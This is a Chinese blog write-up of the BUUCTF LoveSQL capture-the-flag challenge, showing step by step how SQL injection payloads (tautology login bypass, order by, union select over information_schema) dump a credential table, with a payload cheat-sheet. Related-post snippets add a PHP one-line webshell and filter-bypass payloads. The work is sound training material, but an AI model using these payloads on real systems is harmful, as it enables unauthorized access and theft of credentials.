第八题——[极客大挑战 2019]LoveSQL

最新推荐文章于 2022-04-06 20:27:35 发布
最新推荐文章于 2022-04-06 20:27:35 发布
阅读量229 收藏
点赞数 1
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/115373328
版权
题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,两栏输入框,使用全真语句进行测试

用户名输入a' or '1'='1密码输入b' or '1'='1,出现一个字符串,提交flag提示错误,说明这个字符串不是flag
在这里插入图片描述
在这里插入图片描述

第二步:查看是否存在堆叠注入

在用户名和密码都输入admin';show tables;发现不存在堆叠注入。
在这里插入图片描述
在这里插入图片描述

第三步:使用order by确定回显点

  1. 在用户名一栏输入1' order by 3#,密码一栏输入1,提交无异常。
    在这里插入图片描述
    在这里插入图片描述

  2. 在用户名一栏输入1' order by 4#,密码一栏输入1,提交发现异常。
    在这里插入图片描述
    在这里插入图片描述

结论:可以显示3个字段

第四步:使用union select获取数据

  1. 在用户名一栏输入1' union select 1,2,3#,密码输入1进行试探,发现在2,3点出显示数据
    在这里插入图片描述
    在这里插入图片描述

  2. 对表名进行爆破,用户名一栏输入1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#密码一栏输入1,显示出表名。
    在这里插入图片描述
    在这里插入图片描述

  3. 对字段名进行爆破,输入1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#,显示出三个字段名
    在这里插入图片描述

  4. 输入1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#显示数据,发现flag:flag{17de2610-1f0f-4623-a20a-d785d85b4279}
    在这里插入图片描述

sql语法

  1. order by 3#用于确定几个字段
  2. union select 1,2,3#用于确定回显点
  3. union select 1,2,database()#用于确定当前数据库名称
  4. union select 1,2,group_concat(schema_name) from information_schema.schemata#用于查看所有数据库名称
  5. union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#用于都确定表名
  6. 1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘l0ve1ysq1’#用于确定字段名
  7. 1’ union select 1,2,group_concat(id,username,password) from (databasename.tablename)#输出数据
想学习安全的小白
关注
专栏目录
BUUCTF系列 // [极客挑战 2019] LoveSQL
qq_45805420的博客
10-03 541
前言 本知识点:SQL注入 WP (这居然是个连续剧。。。 ) 首先尝试使用上一的解法绕过看看(上一 WP 的 传送门),结果如下: 注意到密码有些奇怪,尝试着用 MD5 解码失败,也没啥思路(最后事实证明确实也用不到这玩意),故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点 接着使用联合查询寻找注入点即回显
CTF学习笔记——[极客挑战 2019]BuyFlag
Obs_cure的博客
02-16 3551
一、[极客挑战 2019]BuyFlag 1.目 2.解步骤 MENU界面下有buyflag的界面,按F12看看 查了一下is_numeric()这个函数,他的作用是判断输入是否是数字的。如果是纯数字返回true,如果不是返回false。这道注释的代码逻辑是要输入一个非纯数字的字符串且等于404,密码才能正确。 然后顺手百度了一下这个函数的漏洞,在这里贴出来: 这个函数和mysql结合起来就容易出问,那是因为is_numeric判断的时候,当碰到16进制数的时候,也会判断成数字 is_num
CTF-Web-[极客挑战 2019]HardSQL
归子莫的博客
05-03 2947
CTF-Web-[极客挑战 2019]HardSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges Web类,[极客挑战 2019]HardSQL 打开目的实例 思路 SQl目,首先试一试...
BUUCTF [极客挑战 2019]EasySQL1
WINDY_PACE的博客
11-24 2071
BUUCTF [极客挑战 2019]EasySQL1
[极客挑战 2019]LoveSQL wp
{OvEr}的博客
11-19 178
[极客挑战 2019]LoveSQL wp 打开页面是这样的,我们先试试万能密码 显示登陆成功,通过上面的url可以判断有sql注入且为get方式下面我们来进行注入。 首先我们来查列数,注入 ?username=admin&password=123 %27 order by 4%23 发现不存在,说明有1,2,3列,继续我们来找注入点,注入语句 ?username=admin&password=123 %27 union select 1,2,3 %23 找到注入点是2,3
BUU-WEB-[极客挑战 2019]Upload
qq_24033605的博客
05-09 192
[极客挑战 2019]Upload 简单说一下思路,从目看出来是文件上传漏洞,利用一句话木马使用蚁剑或者菜刀连接。 一句话木马为: GIF89a? <script language="php">eval($_REQUEST[shell])</script> 文件后缀名为phtml 上传的时候修改文件属性。 找到上传的网页,利用工具连接。 成功连接,打开终端搜寻flag。 flag{69a6b539-77e8-49a3-bad7-7187d1541c59} ...
极客挑战 2019]PHP CVE-2016-7124 绕过__wakeup()
偷一个月亮
09-02 1014
极客挑战 2019]PHP 扫描发现备份源代码www.zip 注意 private私有属性,不能从外面去更改访问 只能从内部函数里面进行更改 源代码如下: __wakeup()是被反序列后自动调用的函数。 自动将属性改为guest但是和后面的admin有所冲突。 O:4:"Name":2:{s:14:"�Name�username";s:5:"admin";s:14:"�Name�password";...
【学习笔记 25】 buu [极客挑战 2019]LoveSQL
weixin_43553654的博客
07-27 317
0x00 知识点 1.利用常用万能密码登录 2.利用union构造联合注入得到flag 0x01 解思路 1.打开网站,映入眼帘的就是一个登录界面,并且网页头上有一行小字,说是不让用sqlmap跑,那我偏要试试,但是现在还找不到注入点,继续进行,等下再试。这时在查看源码时发现验证的check.php页面和get的传参方式,直接访问check.php网页什么重要信息都没,那继续回到原网页利用常用的万能密码进行登录测试。 这里用到的是 用户名:admin'/* 密 码:*/' 登录成功。 发现被蓝色圈圈出
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 328
打开目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
BUUCTF__[极客挑战 2019]LoveSQL_
风过江南乱的博客
06-19 1194
前言 很好,考完了死亡高数和大物,虽然还没考完,不过艰难的已经过去了,感觉神清气爽,水一。 u1s1,线上考试=在海里考试。 读 嗯,还是熟悉的背景图,好几都是这个师傅出的sql注入。 首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错 然后尝试注入,发现,好像没有过滤,连 union 联合注入都能使用,并且很容易得到数据库名称,得到数据库名称geek 但在此之前,先得到列数为3,不是3则提示报错 然后,基本操作得到表信息,有两个表geekuser和l0ve1ysq
极客挑战 2019]BabySQL
shannidawang的博客
07-24 107
知识点:双写绕过 先进行测试 ?username=admin&password=123'union select 1?# You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1?'' at line 1 根据回显说明union select被检测到了 猜测使用replace函
BUUCTF刷笔记 EasySQL 极客挑战2019
m0_46576074的博客
05-14 159
[极客挑战 2019]EasySQL 进入网页 使用万能密码admin’ or 1=1 #登入 得flag
BUUCTF笔记之Web系列部分WriteUp(一)
克格莫(有需要的私信)
04-29 960
1、[极客挑战 2019]EasySQL
BUUCTF [极客挑战 2019]EasySQL
m0_49025459的博客
04-06 275
目 这啊很快奥,我就想用个永真表达式测试一次,结果一下子就出来了 admin' or '1'='1 登录
BUUCTF-[极客挑战 2019]LoveSQL 1
ITgougou_的博客
12-19 157
万能密码登入 尝试解密MD5,解密失败尝试其他注入思路 http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.node3.buuoj.cn/check.php?username=admin' order by 3%23&password=123 有回显 http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.n...
buuctf 极客挑战 lovesql
fightte的博客
05-17 191
界面长这样: 尝试输入1’判断是否有注入漏洞: 这样的报错,可以看出是有的。 输入万能密码进行尝试 1’or 1 =1 #进行尝试: 登录成功,输出了奇怪的字符串,但与密码学无关。 是get型的输入,将网址栏的password进行改变,改为:13‘ 发现出现了和13’有关的报错。 判断是字符型,而不是整型。 尝试在password处使用sql语句进行堆叠注入: 好复杂,暂时放下, 。。。。。。 继续: 尝试使用order by 语句查询字段数: 字段数为3时,应该是存在的,但转到4就不存在了。 ?.
BUUCTF-[极客挑战 2019]Http1
Monica的博客
09-14 1544
目录 目:​ 知识点: Referer User-Agent X-Forwarded-For 分析: 目: 知识点: Referer HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。Referer 常用在防盗链和防恶意请求中。 Referer是HTTP请求header的一部分,当浏览器(或者模拟浏览器行为)向web服务器发送请求的时...
buuctf-web-[极客挑战 2019]BabySQL
weixin_46079186的博客
07-02 166
打开网站 输入用户名密码 admin & 123456 返回密码错误 密码后面输入一个单引号页面报错 判断列 当我输入’order by 1#时 他把我or、by 都过滤了 尝试绕过 'oor rder bby y 1 # 成功绕过 判断4个列 ’order by 4# 判断回显点 输入的时候union select 也被过滤了 构造绕过:'ununionion selselectect 1,2,3# 查看数据库名 'uniunionon selselect..
BUUCTF__[极客挑战 2019]Havefun_
风过江南乱的博客
05-16 1590
真的是最简单的一了。以至于看到flag还以为是假的,毕竟吃过假flag的亏。 拿到目,很好看 相关性F12,发现被注释的代码。 很简单的一段代码。 尝试get传入cat=dog http://e2c1cdbb-e689-45c2-ba6c-d8fddd629759.node3.buuoj.cn/?cat=dog 神奇的事情出现了,出现了一串神秘字符串。 尝试提交flag,成功,emmm。 就这?就这?就这? 最后 没什么知识点,就乐呵一下吧。 附
极客挑战 2019]LoveSQL 1
最新发布
08-24
LoveSQL 1是极客挑战2019的一个目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值